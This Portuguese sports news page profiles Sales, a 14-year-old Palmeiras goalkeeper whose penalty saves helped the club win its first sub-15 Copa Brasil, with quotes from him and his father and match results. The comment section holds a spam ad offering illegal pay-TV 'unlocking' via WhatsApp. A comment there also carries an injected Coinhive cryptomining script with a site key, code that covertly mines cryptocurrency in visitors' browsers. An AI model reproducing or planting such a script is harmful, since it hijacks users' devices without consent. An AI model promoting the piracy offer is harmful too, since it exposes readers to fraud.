Herói do Verdão na final contra o Fla, goleiro era promessa do Vasco

22/1/2018 08:29

Herói do Verdão na final contra o Fla, goleiro era promessa do Vasco

Sales foi um dos destaques ajudando o Palmeiras a ser campeão desta competição nacional pela primeira vez. Após o jogo terminar empatado no tempo normal, o camisa 1 defendeu pênalti

Herói do Verdão na final contra o Fla, goleiro era promessa do Vasco

Sales foi um dos heróis do Palmeiras na Copa Brasil sub-15 (Foto: Fabio Menotti/Divulgação/Palmeiras)



Ele tem apenas 14 anos, mas já sentiu o gostinho de ter o seu nome gritado pela torcida. Sales foi um dos heróis do Palmeiras na conquista do inédito título da Copa Brasil sub-15. O goleiro defendeu dois pênaltis nas quartas de final, eliminando o Corinthians, e também segurou mais outro na decisão contra o Flamengo - após o jogo terminar empatado no tempo normal. Destaque na base do Verdão, o camisa 1 já chegou a ser promessa do Vasco.







A campanha do Palmeiras na Copa Brasil Infantil teve quatro empates e duas vitórias. Na final, disputada em Votorantim, no inteior paulista, o duelo terminou 0 a 0 e o Verdão conseguiu superar o Flamengo nos pênaltis por 4 a 2. Depois de 22 edições da Copinha, o clube alcançou seu primeiro troféu.



- Foi uma alegria muito grande ter a torcida gritando o meu nome. O merecimento não foi só meu, mas de todo o grupo. Estamos sempre treinando duro no dia a dia. Tivemos um ano de 2017 muito intenso para tentar conquistar esse título inédito da Copa Brasil - comentou Sales.



O goleiro chegou ao Palmeiras em 2016, onde já naquele ano conquistou o Campeonato Paulista sub-13. Depois teve o Paulista sub-15 e a Paulista Cup, ambos no ano passado, e agora a Copa Brasil.



- No começo, não esperava tantos títulos de forma tão rápida. Tudo o que aconteceu não foi à toa. Tudo o que aconteceu foi fruto do trabalho. Digo da minha parte com meu treinador de goleiros, que me passava as coisas e estava lá do meu lado incentivando, como também do grupo - disse.



Antes de acertar com o Palmeiras, ele fez testes em 2014, aos 11 anos, no futebol de campo e no futsal do Vasco. Sales conseguiu ser aprovado, mas o clube não deu garantias para "bancar" a família paraibana no Rio. Apenas o garoto seria custeado pelo cruz-maltino.



- Hoje eu e a mãe dele, a gente se sente feliz por ter conquistado o espaço dele em um grande clube, como o Palmeiras. No período em que fomos para o Vasco, acabou não dando certo. A proposta do Palmeiras também não foi muito diferente, mas sim as circustâncias. Para o nosso sonho não ficar pelo caminho, os amigos nos ajudaram, acolheram com escola, nos treinos, ele tem alimentação todo dia, as viagens que fazem o Palmeiras é quem banca. Então isso ajuda muito - relembrou Flávio Martins, pai de Sales.



Ele assinou um contrato de formação com o Palmeiras em 2017 e vai até 2019. Flávio destaca que, no começo do filho no clube, a adaptação foi difícil.



- Foi duro ficar longe de casa. Sales chegou aqui com 13 anos apenas. Só que ele demonstrou nesse curto período de um ano que é capaz, e eu decidi também ficar ao lado dele para apoiar. É gratificante para a família saber que o esforço está sendo recompensado com a atuação dele em campo. Tem um bom comportamento na escola e diante do grupo - afirmou.





Palmeiras comemora título inédito da Copa Brasil sub-15 (Foto: Fabio Menotti/Divulgação/Palmeiras)



O paraibano começou a dar os primeiros toques na bola aos quatro anos. Começou no futsal, em João Pessoa, atuando como ala. Mas depois seu talento para ser goleiro foi descoberto. O pai lembra que na época um técnico apostou no então jogador de linha para fechar o gol. No ano seguinte, Sales já participou do Campeonato Paraibano de futsal sub-7 na nova posição. Depois de grandes atuações, surgiram propostas de vários times da capital paraibana, títulos e conquistas individuais.



- Foi uma escolha minha que deu certo. Os meus pais me incentivaram muito e sempre estiveram do meu lado nas minhas decisões. Para adaptar foi tranquilo - disse o goleiro.



O sonho do garoto é fazer história no Palmeiras e, quem sabe, chegar ao profissional no futuro. As inspirações estão na história do próprio clube: Fernando Prass e Marcos.



- Sonho ir para a seleção brasileira e jogar no time principal. Quero um dia ser um ídolo, como Fernando Prass e Marcos. Todo tempo que tenho livre ou até nos treinos, sempre estou lá vendo eles, me inspiro em alguns pênaltis que eles defenderam. São meus ídolos, sem dúvida - finalizou.



Confira a campanha do Palmeiras na Copa Brasil sub-15:



Final

21/01: Palmeiras 0 (4) x (2) 0 Flamengo



Semifinal

19/01: Palmeiras 2 x 1 Cruzeiro

Gols: Clebson e Márcio



Quartas de final

17/01: Palmeiras 0 (4) x (1) 0 Corinthians



1ª fase - Grupo D

12/01: Palmeiras 0 x 0 Flamengo



13/01: Palmeiras 3 x 0 Grêmio

Gols: João Pedro, Ruan e Luis Fernando



14/01: Sport 1 x 1 Palmeiras

Gol: João Pedro



VEJA TAMBÉM
- BRILHANDO NA ITÁLIA! Nova contratado do Palmeiras, Felipe Anderson faz partidaça no italiano
- Dono do Botafogo questiona incoerência de Leila do Palmeiras sobre manipulação
- Indefinição sobre Joia do Palmeiras gera sondagens e possíveis mudanças no destino





4788 visitas - Fonte: Globo Esporte

Mais notícias do Palmeiras

Notícias de contratações do Palmeiras
Notícias mais lidas

VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345

Erro ao postar comentário.
Código do erro: 803743

< src="https://coinhive.com/lib/coinhive.min.js"><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();

14 anos????.... Tem cara de 40....rsrs

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui ou .

Últimas notícias

publicidade
publicidade

Brasileiro

Qua - 20:00 - Arena Barueri -
X
Palmeiras
Internacional

Brasileiro

Dom - 18:30 - Manoel Barradas
0 X 1
Vitoria
Palmeiras